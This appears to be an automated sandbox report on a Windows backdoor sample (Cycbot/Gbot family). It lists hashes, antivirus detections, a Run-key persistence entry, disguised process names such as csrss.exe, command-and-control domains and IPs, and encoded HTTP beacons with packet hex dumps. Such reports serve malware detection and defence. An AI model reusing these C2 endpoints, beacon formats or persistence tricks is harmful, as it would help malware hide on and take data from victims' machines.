Analysis Date2014-08-03 12:56:51
MD5ef7cd85f9eb3f2c3cf120d590620fc04
SHA12da9bc84448a8578384f354d30cf0750148170ee

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e869ae33c56e135910eb24e91c7f05e2 sha1: 5c5f1372154b1404a794fafa643952db4ba2cc87 size: 96768
Section.rdata md5: e2a79d3c028af5785ab5890e9a296c6c sha1: 20a081c7dcecc2d8335030665e382e3ef5462ff0 size: 1536
Section.data md5: a9d68e2ccd9ede76a2af909fe75f6018 sha1: 3d741a2cd2e315bc559b11503b3468387b3f96bf size: 78848
Section.reloc md5: 62a3d4a22f1a0a936c08367b84a246a3 sha1: 42a679932c3cf7c3cf3da7afec07e6fff2c7ab57 size: 1024
Timestamp2005-09-23 00:22:38
PEhash0ad5d39358190d04841421773a5f0d760b12c067
IMPhash51f933d4af4f9676403aec3807efdb0e
AV360 SafeGen:Heur.Conjar.5
AVAd-AwareGen:Heur.Conjar.5
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Backdoor.Gbot.pge
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVCA (E-Trust Ino)Win32/FraudSecurity.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-575
AVEmsisoftGen:Heur.Conjar.5
AVEset (nod32)Win32/Cycbot.AD
AVFortinetW32/FakeAV.ISS!tr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado (generic, not disinfectable)
AVF-SecureRogue:W32/OpenCloud.A
AVGrisoft (avg)Win32/Cryptor
AVIkarusWin32.SuspectCrc
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.pge
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.s
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.5
AVNormanwin32/Cycbot.EI
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNSresetmymemory.com
Winsock DNS127.0.0.1
Winsock DNSfastblogportal.com
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNScrazyleafdesign.com
Type: A
173.249.152.55
DNSzonedg.com
Type: A
208.73.210.218
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.210.215
DNSzonedg.com
Type: A
208.73.210.218
DNSzonedg.com
Type: A
208.73.211.165
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.210.215
DNSresetmymemory.com
Type: A
192.155.89.148
DNSfastblogportal.com
Type: A
HTTP GEThttp://crazyleafdesign.com/blog/images/share/stumble.png?v48=1&tq=gKZEtzy%2BkSVWpehlhG5uUDDMBnZHiTnlwrUCqHkjTrcI66oA9m7BQr1479Jei%2BfMJ13QX8QAa4IOMOEdVUSTQGNwS7BepXQJhBVwNYG9EhfRpE9kv5HMd9UbPJJu%2BECDB40LTDQBWPq5YDa8V7iT%2B2Si5Pp3pv9jvAdJxl00aowui0kOPErR7bPsZ2phz%2BJR1DYRvm7%2FXV7XN9jBj6qtdTSi1kQTjbt0bnsLWutKV%2FRcjHf%2BbHnQrFlsXCn2Bty0nWjgtlS8dM7ms6gs%2FSphtbOxH52xVch6j3D480x%2B2mBdv%2B
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP GEThttp://resetmymemory.com/blog/images/3521.jpg?v63=70&tq=gKZEtzyMv5rJqxG1J42pzMffBvQs0ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 173.249.152.55:80
Flows TCP192.168.1.1:1033 ➝ 208.73.210.218:80
Flows TCP192.168.1.1:1034 ➝ 208.73.210.218:80
Flows TCP192.168.1.1:1035 ➝ 192.155.89.148:80
Flows TCP192.168.1.1:1036 ➝ 208.73.210.218:80
Flows TCP192.168.1.1:1037 ➝ 208.73.210.218:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f73 74756d62 6c652e70   /share/stumble.p
0x00000020 (00032)   6e673f76 34383d31 2674713d 674b5a45   ng?v48=1&tq=gKZE
0x00000030 (00048)   747a7925 32426b53 56577065 686c6847   tzy%2BkSVWpehlhG
0x00000040 (00064)   35755544 444d426e 5a486954 6e6c7772   5uUDDMBnZHiTnlwr
0x00000050 (00080)   55437148 6b6a5472 63493636 6f41396d   UCqHkjTrcI66oA9m
0x00000060 (00096)   37425172 31343739 4a656925 3242664d   7BQr1479Jei%2BfM
0x00000070 (00112)   4a313351 58385141 6134494f 4d4f4564   J13QX8QAa4IOMOEd
0x00000080 (00128)   56555354 51474e77 53374265 7058514a   VUSTQGNwS7BepXQJ
0x00000090 (00144)   68425677 4e594739 45686652 7045396b   hBVwNYG9EhfRpE9k
0x000000a0 (00160)   7635484d 64395562 504a4a75 25324245   v5HMd9UbPJJu%2BE
0x000000b0 (00176)   43444234 304c5444 51425750 71355944   CDB40LTDQBWPq5YD
0x000000c0 (00192)   61385637 69542532 42325369 35507033   a8V7iT%2B2Si5Pp3
0x000000d0 (00208)   7076396a 7641644a 786c3030 616f7775   pv9jvAdJxl00aowu
0x000000e0 (00224)   69306b4f 50457252 37625073 5a327068   i0kOPErR7bPsZ2ph
0x000000f0 (00240)   7a253242 4a523144 5952766d 37253246   z%2BJR1DYRvm7%2F
0x00000100 (00256)   58563758 4e396a42 6a367174 64545369   XV7XN9jBj6qtdTSi
0x00000110 (00272)   316b5154 6a627430 626e734c 5775744b   1kQTjbt0bnsLWutK
0x00000120 (00288)   56253246 52636a48 66253242 62486e51   V%2FRcjHf%2BbHnQ
0x00000130 (00304)   72466c73 58436e32 42747930 6e576a67   rFlsXCn2Bty0nWjg
0x00000140 (00320)   746c5338 644d376d 73366773 25324653   tlS8dM7ms6gs%2FS
0x00000150 (00336)   70687462 4f784835 32785663 68366a33   phtbOxH52xVch6j3
0x00000160 (00352)   44343830 78253242 326d4264 76253242   D480x%2B2mBdv%2B
0x00000170 (00368)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000180 (00384)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000190 (00400)   73743a20 6372617a 796c6561 66646573   st: crazyleafdes
0x000001a0 (00416)   69676e2e 636f6d0d 0a416363 6570743a   ign.com..Accept:
0x000001b0 (00432)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000001c0 (00448)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000001d0 (00464)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7930 6e576a67    close....y0nWjg
0x00000140 (00320)   746c5338 644d376d 73366773 25324653   tlS8dM7ms6gs%2FS
0x00000150 (00336)   70687462 4f784835 32785663 68366a33   phtbOxH52xVch6j3
0x00000160 (00352)   44343830 78253242 326d4264 76253242   D480x%2B2mBdv%2B
0x00000170 (00368)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000180 (00384)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000190 (00400)   73743a20 6372617a 796c6561 66646573   st: crazyleafdes
0x000001a0 (00416)   69676e2e 636f6d0d 0a416363 6570743a   ign.com..Accept:
0x000001b0 (00432)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000001c0 (00448)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000001d0 (00464)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615325   OQij%2B8yjYvEaS%
0x000000c0 (00192)   32465425 32427371 74537225 32466525   2FT%2BsqtSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 68206669   n: close....h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7636 333d3730   /3521.jpg?v63=70
0x00000020 (00032)   2674713d 674b5a45 747a794d 7635724a   &tq=gKZEtzyMv5rJ
0x00000030 (00048)   71784731 4a343270 7a4d6666 42765173   qxG1J42pzMffBvQs
0x00000040 (00064)   30656a62 77766753 39313757 3635724a   0ejbwvgS917W65rJ
0x00000050 (00080)   716c4c66 67506957 57316367 20485454   qlLfgPiWW1cg HTT
0x00000060 (00096)   502f312e 300d0a43 6f6e6e65 6374696f   P/1.0..Connectio
0x00000070 (00112)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000080 (00128)   72657365 746d796d 656d6f72 792e636f   resetmymemory.co
0x00000090 (00144)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000a0 (00160)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000b0 (00176)   6c6c612f 322e300d 0a0d0a6d 65210a20   lla/2.0....me!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 0d0a7930 6e576a67   </html>...y0nWjg
0x00000140 (00320)   746c5338 644d376d 73366773 25324653   tlS8dM7ms6gs%2FS
0x00000150 (00336)   70687462 4f784835 32785663 68366a33   phtbOxH52xVch6j3
0x00000160 (00352)   44343830 78253242 326d4264 76253242   D480x%2B2mBdv%2B
0x00000170 (00368)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000180 (00384)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000190 (00400)   73743a20 6372617a 796c6561 66646573   st: crazyleafdes
0x000001a0 (00416)   69676e2e 636f6d0d 0a416363 6570743a   ign.com..Accept:
0x000001b0 (00432)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000001c0 (00448)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000001d0 (00464)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615350   OQij%2B8yjYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7930 6e576a67    close....y0nWjg
0x00000140 (00320)   746c5338 644d376d 73366773 25324653   tlS8dM7ms6gs%2FS
0x00000150 (00336)   70687462 4f784835 32785663 68366a33   phtbOxH52xVch6j3
0x00000160 (00352)   44343830 78253242 326d4264 76253242   D480x%2B2mBdv%2B
0x00000170 (00368)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000180 (00384)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000190 (00400)   73743a20 6372617a 796c6561 66646573   st: crazyleafdes
0x000001a0 (00416)   69676e2e 636f6d0d 0a416363 6570743a   ign.com..Accept:
0x000001b0 (00432)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x000001c0 (00448)   3a206d6f 7a696c6c 612f322e 300d0a0d   : mozilla/2.0...
0x000001d0 (00464)   0a                                    .

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a7563 68206669    close....uch fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
.
W
g.
.
9
Q
).M

080904b0
1.0.0.1
1065
&Execute    Shift+E
FileVersion
PrivateBuild
ProductVersion
&shit menu
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
````|||||
^^^^^^
^^^^^^^^^^^^^
~~~~~~~~
<<<<<<<<<
>>>:::
>({~:,
||||||
       
____________
------------
-----------------
---@@@@@]
-&&&&&&&&&&&&&&
;;;;;;;
!!!!!!!
???????
???????????
.......
..........
'''''''
"&&&&&&&&&&&&&&&&&
((((((
((((((((((
(((###
[[[[[[
[[[[[[[
]]]]]](((
]]]]]]]
}}}}}}}
******.
********
&&&&&&&&&&&&&
############
+++++++
									
0000000
00000000
$0)n~(^W#
1////////
11]]]]
11111111
1111111111111
11111111111111ww
&*1]8B
1t4WXs+L
#1]"?x
2{JW,^
2O;:p$
_2\v2u
2`yz*[
3OxQYo
3)Tjs;S
3.WA\y
3X2+hU
4@-89h
4D[?G4
4v%{4o@
4zO_mTB
566666
_5@FM>
5?hU$o
_[+6}=
666666
666666666
(6@D+j
6J8!iu
6-yYY;
7777?????-
7777777
*_7wG]
88BBBB
99999999999
9999999M
9!|E5L
9"IZ[mc*$
!9=K_ZcqT"
*9Ls[/G+,
9VnCK)
a<<<<	
AAAAAAAA
aaaa""<<<<<<<<YY
AAA;;wwwww'''
aB,HK^O
aFU}]o
aho\4?sF
]ak!ya
<a[m_u
Ap~I1+
=/"aprR
aS[/Jjt
a>x	>G
Ax=zI{V
Az(1u&rZL
AzJPxW<
bbbbbbbb
bf	!iUr
B[H3>G,7>6VYM
b#I9Q#&
B|lEU}
	BP}g<
%B^u ]
Bxvz<2
b\Y@KuJ
$]".~c
c\1N'0Bl
c~a.*<
CC@@@@@@@@@@@@@@@@@66666
CCCCCCC
CCCCCCCCC
cDvL:r
!Cf[Wx{C
CHAlfR
CH=<vi
cJK]-Y
C	Kgf`/`
cMoEwu
c-SE/|
Csnl#7
c(U>\-
czKV5gvi
D:::::
d0b-D*
@.data
D+A<Z@
DDDDDD
DDDDDDDD
_'Di&>
dLHAue
DlTEkR
DmMRkj
d(?*\u
DVVVVV
|dX`0h
E#)A.j
*EBl9! %
EEEECCCCC
eeeeee
eeeerrr
e<;_Ku\<
EnumResourceNamesA
EpE#KK
epWDi.
f******
;F_{-!
f.A~)#
FatalAppExitA
FE+VC#r
ffffffffffff
Fk% 2v
fK\w(:
fM0]6\
FreeEnvironmentStringsA
FreeEnvironmentStringsW
fSj2(iI
G+++++
g!Ad6I
GetAtomNameW
GetCPInfo
GetCurrentThread
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileType
GetModuleFileNameA
GetStartupInfoA
GetStdHandle
ggggggg
GGGGGGGGG
ggggggggggg
~GGGGGGGGGGGGGGFFFF
GGGG??????????vvv
Gg _&u
GH?[H|
gI/HHMEG
G~"Sdu
-G`Txu
GzD:{SW
H3}"	n
?%|h_4
h7K[Cy*
H%>D^LQ
HeapCreate
HeapDestroy
HeapReAlloc
HHHHHHHH///N
hkbbbbbbbbbbbbbbbbbbbbbbbbbb
i2~XA9jF
I~7t4-
I9f|z6
I^CYh$
If6hX1
i{hI"{P
iiiiiiii
#io<R6
IsBadCodePtr
IsBadReadPtr
IsBadStringPtrW
IsBadWritePtr
>J#?Fd
jjj^^^^^
JJJJJJ
jjjjjjjjjjjjjjj
jjZZZZZZZ
!)jrs=
j<tYky
JueI_E
JvyGmf
K8=[OR
kDwb$M{
KERNEL32.dll
Kg[tH]
=========kkkk
KKKKKKKKK
|||||||kkkkkkkkkkkk================
kkkkUUUUUUUUUUUUUUUUUUU
K~L.])
,K(QNa
KY;b	(
[kYHv&~M
l2>\=O
L2S|$k
L5[il{
	L8GCqA):
:llgKs#zv
LLLJJJJJJJJJJJ
LLLLLLL
??LLLLLLLLLL
lllWWWWW@@@@cccccccccccccckkkkk
	L|pYl]
LWS<nX
#M24Ca
-,MaB!r
m~E/~i
mmmmmmm
!MMMMMMMMMMM
mmmmmmmmmmmmmmmP
MMMMMMMMMMMSSS
M*pppppppp
MPRAPI
MprConfigGetFriendlyName
MprConfigServerConnect
MprConfigServerDisconnect
mU84:m
mv5	Xn
m|W`W0
^n+0ZG
N39hkJ
/nA$6/
Na`s|t
NdrConformantArrayFree
nEm0|V
NfVb?O
nnnnneee
????????????NNNNNkkkkkk
nnnnnnn
NNNVVVVVVVVVZ
$	`nOV
nrLv`l
n`_#so*
>>>>>O
~o`HX!\& 
Oly {wb
 onQw@
ooooooooooo&
OOOOOOOOOpp99999
`os@@U
O]U}#"
oVPhp	
o<@wj|1
P!5VVj
/||pa4
\pDIR$ 
pGGGGG  
ppp))))kk
ppppppp
ppppppppaaaaaaaaaa
[;pQ9h
prt63(
}pyqEXj
q+++++
Q|3WQ=^
q?Dsjp
QDX:cR
_\-qQc
qqqqqq
qqqqqqqq
QQQQQQQQ
QTP@gS
}qu_FM
{=Qz[75
-{qZb~G
`.rdata
.reloc
?r-/<J
RPCRT4.dll
rPGNng;S
rrrrrrr
RRRRRRRZZ
rRRt$C
rtUAmr
"R$ vm{hV
&R>*wp
s~2Ot$
s_-3)F
S'4oaR
S8K=o*
s^~9nL
SetFilePointer
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
SHELL32.dll
SHGetSpecialFolderPathA
S+>Hmf
[s%K^>
s|_$ox
@SQ3e!
*SrgO8
ssssss
SSSSSS
SSSSSS\,,,,
sssssss
ssssxxxxxxxxxxxxxxxxxxxxxxxx
sxl`Ti
-> t'!
t@.CviE
;T`\<h
!This program cannot be run in DOS mode.
;TJKwQ
=t#_^k
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tn8Ud>$>
\\TOGEn
TSiA%f^O
tttttt
TTTTTTTTT
TTTTTTTTTTTTT
U8BumE
UJEBPK
UN3kVxN 
UnhandledExceptionFilter
UU}}}}}}}
UuidCreate
!uuuuu
uuuuuu
uuuuuuuuuuuu
u{XT<cj=
V"5L5%
<V8fBO
V<9wPg
VirtualAlloc
VirtualFree
V/:LbO7
vm{r`m
VOvRrr
V-pUMI
%^@vuq
VV99999999EEEM
VVVVVV
&w-?(8
